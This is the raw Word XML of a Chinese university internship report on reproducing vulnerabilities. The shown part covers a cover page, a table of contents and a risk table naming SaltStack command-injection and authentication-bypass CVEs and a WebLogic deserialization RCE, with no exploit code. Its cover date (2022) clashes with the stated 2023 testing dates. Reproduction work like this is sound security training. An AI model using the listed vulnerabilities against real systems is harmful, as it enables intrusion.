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cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年07月20日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="147463564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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              <w:sz w:val="21"/>
            </w:rPr>
            <w:t>目录</w:t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cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc28487" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>1.漏洞复现结论（</w:t>
          </w:r>
          <w:r>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28487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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc7481" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>风险等级分布</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7481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"_Toc24528" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>2.工作计划（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24528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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc13939" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>工作人员</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13939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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc3137" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>漏洞对象</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3137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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc7909" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>漏洞复现阶段</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7909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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc1860" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>2.4风险等级</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1860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"_Toc6133" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.漏洞复现过程（</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6133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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc18532" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.1 风险管理及规避</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18532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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc4033" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.</w:t>
          </w:r>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4033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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc28445" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试中所用的工具</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28445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"_Toc12892" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4. 漏洞复现结果（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12892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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc32666" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1 POC插件编写</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32666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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc25120" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2 漏洞信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25120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r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr>
          <w:head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spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.漏洞复现结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>360实习实训</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全人员采用科学的漏洞复现步骤于2023年07月14日至2023年07月20日对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实训项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋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cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single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eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个，其高危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single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eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个，中危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个,低危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"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  <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14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8"/>
        <w:gridCol w:w="4709"/>
        <w:gridCol w:w="22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95" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b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bookmarkStart w:id="3" w:name="_Hlk482954515"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b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4714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b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宋体"/>
                <w:b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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b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宋体"/>
                <w:b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风险值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3" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="19"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体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宋体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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/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SaltStack多个高危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/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高危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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="19"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体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宋体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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/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Weblogic反序列化远程代码执行绕过漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体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宋体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高危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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="19"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体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宋体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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/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213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:cs="宋体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bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="5" w:name="_Toc7481"/>
      <w:bookmarkStart w:id="6" w:name="_Toc16656"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SaltStack多个高危漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2020-16846: 命令注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2020-25592: 验证绕过漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
